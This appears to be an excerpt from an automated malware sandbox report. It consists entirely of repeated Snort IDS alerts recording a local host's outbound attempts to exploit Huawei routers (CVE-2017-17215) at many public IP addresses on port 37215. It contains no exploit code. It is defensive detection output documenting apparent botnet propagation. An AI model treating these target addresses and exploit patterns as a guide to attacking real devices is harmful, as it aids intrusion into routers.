              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:53510 -> 41.40.22.39:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:53510 -> 41.40.22.39:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:58452 -> 197.14.227.73:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:58452 -> 197.14.227.73:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:57022 -> 197.120.240.105:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:57022 -> 197.120.240.105:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:40834 -> 197.168.107.124:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:40834 -> 197.168.107.124:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56262 -> 156.230.226.221:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56262 -> 156.230.226.221:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:33318 -> 156.82.201.224:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:33318 -> 156.82.201.224:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:55078 -> 156.31.9.128:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:55078 -> 156.31.9.128:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:54338 -> 156.70.243.82:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:54338 -> 156.70.243.82:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:46652 -> 197.92.27.0:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:46652 -> 197.92.27.0:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:44244 -> 41.42.121.144:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:44244 -> 41.42.121.144:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56246 -> 156.221.191.162:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56246 -> 156.221.191.162:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:47806 -> 156.153.229.114:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:47806 -> 156.153.229.114:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52406 -> 156.127.171.55:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52406 -> 156.127.171.55:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:49250 -> 197.182.24.202:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:49250 -> 197.182.24.202:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:38030 -> 41.111.116.8:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:38030 -> 41.111.116.8:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56710 -> 41.199.255.244:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56710 -> 41.199.255.244:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52570 -> 197.177.48.18:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52570 -> 197.177.48.18:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:46430 -> 156.172.255.70:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:46430 -> 156.172.255.70:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52674 -> 156.211.164.49:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52674 -> 156.211.164.49:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:55648 -> 197.169.39.140:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:55648 -> 197.169.39.140:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:55280 -> 156.88.26.137:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:55280 -> 156.88.26.137:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:41422 -> 197.47.117.170:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:41422 -> 197.47.117.170:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:38824 -> 156.236.192.16:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:38824 -> 156.236.192.16:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:47720 -> 41.220.138.129:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:47720 -> 41.220.138.129:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:54468 -> 197.46.38.93:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:54468 -> 197.46.38.93:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:42664 -> 156.247.199.134:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:42664 -> 156.247.199.134:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:59622 -> 41.201.218.232:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:59622 -> 41.201.218.232:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:55948 -> 156.89.186.115:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:55948 -> 156.89.186.115:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56506 -> 197.49.125.52:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56506 -> 197.49.125.52:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:46288 -> 156.117.58.200:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:46288 -> 156.117.58.200:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:59402 -> 41.189.207.71:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:59402 -> 41.189.207.71:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56688 -> 41.128.149.86:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56688 -> 41.128.149.86:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56446 -> 156.113.7.72:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56446 -> 156.113.7.72:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:33934 -> 156.14.1.85:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:33934 -> 156.14.1.85:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:57274 -> 156.251.146.104:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:57274 -> 156.251.146.104:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:41524 -> 197.226.89.160:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:41524 -> 197.226.89.160:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:44520 -> 197.65.242.5:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:44520 -> 197.65.242.5:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:36214 -> 156.219.182.146:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:36214 -> 156.219.182.146:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52306 -> 197.87.109.131:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52306 -> 197.87.109.131:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:39830 -> 41.101.112.239:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:39830 -> 41.101.112.239:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:55658 -> 156.163.7.110:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:55658 -> 156.163.7.110:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:36076 -> 197.232.125.213:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:36076 -> 197.232.125.213:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:36840 -> 41.109.66.1:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:36840 -> 41.109.66.1:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:49366 -> 197.31.78.122:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:49366 -> 197.31.78.122:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52560 -> 197.196.65.70:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52560 -> 197.196.65.70:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52152 -> 197.92.186.40:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52152 -> 197.92.186.40:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:46246 -> 156.87.117.200:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:46246 -> 156.87.117.200:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:60894 -> 156.56.194.112:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:60894 -> 156.56.194.112:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:57162 -> 197.37.22.33:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:57162 -> 197.37.22.33:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:58486 -> 197.251.185.162:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:58486 -> 197.251.185.162:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:60572 -> 41.117.10.40:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:60572 -> 41.117.10.40:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:40356 -> 156.27.162.36:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:40356 -> 156.27.162.36:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:55694 -> 41.58.29.177:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:55694 -> 41.58.29.177:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:50182 -> 41.138.162.225:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:50182 -> 41.138.162.225:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:43100 -> 156.132.238.227:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:43100 -> 156.132.238.227:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:47702 -> 41.66.97.197:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:47702 -> 41.66.97.197:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:36594 -> 41.183.27.219:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:36594 -> 41.183.27.219:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:44326 -> 197.26.36.220:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:44326 -> 197.26.36.220:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:39558 -> 197.21.125.189:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:39558 -> 197.21.125.189:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:42012 -> 41.199.109.61:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:42012 -> 41.199.109.61:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:45728 -> 156.206.99.218:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:45728 -> 156.206.99.218:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:49700 -> 156.118.1.139:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:49700 -> 156.118.1.139:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:36992 -> 197.130.71.247:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:36992 -> 197.130.71.247:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:38776 -> 156.53.227.174:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:38776 -> 156.53.227.174:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:42918 -> 41.162.16.194:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:42918 -> 41.162.16.194:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:47258 -> 156.41.219.101:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:47258 -> 156.41.219.101:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:34708 -> 41.115.70.80:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:34708 -> 41.115.70.80:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52818 -> 197.41.9.107:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52818 -> 197.41.9.107:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:38554 -> 41.103.81.12:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:38554 -> 41.103.81.12:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:53092 -> 197.241.25.6:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:53092 -> 197.241.25.6:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52674 -> 41.220.170.126:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52674 -> 41.220.170.126:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:51768 -> 156.116.60.230:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:51768 -> 156.116.60.230:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:40168 -> 156.88.160.161:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:40168 -> 156.88.160.161:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:51986 -> 41.7.126.212:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:51986 -> 41.7.126.212:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:33092 -> 197.2.208.45:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:33092 -> 197.2.208.45:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:34340 -> 156.255.56.160:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:34340 -> 156.255.56.160:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:44494 -> 156.251.163.1:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:44494 -> 156.251.163.1:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:42998 -> 41.32.134.206:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:42998 -> 41.32.134.206:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:47922 -> 197.96.68.254:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:47922 -> 197.96.68.254:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:33620 -> 41.98.18.98:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:33620 -> 41.98.18.98:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:49734 -> 156.150.155.115:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:49734 -> 156.150.155.115:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:50586 -> 41.49.155.193:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:50586 -> 41.49.155.193:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:44400 -> 41.202.41.223:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:44400 -> 41.202.41.223:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:33480 -> 156.81.17.31:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:33480 -> 156.81.17.31:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:39068 -> 41.221.78.125:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:39068 -> 41.221.78.125:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:53262 -> 197.115.242.159:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:53262 -> 197.115.242.159:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:37824 -> 156.7.75.75:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:37824 -> 156.7.75.75:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:49210 -> 41.47.228.86:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:49210 -> 41.47.228.86:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:40936 -> 197.136.192.34:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:40936 -> 197.136.192.34:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:37498 -> 41.8.155.166:37215
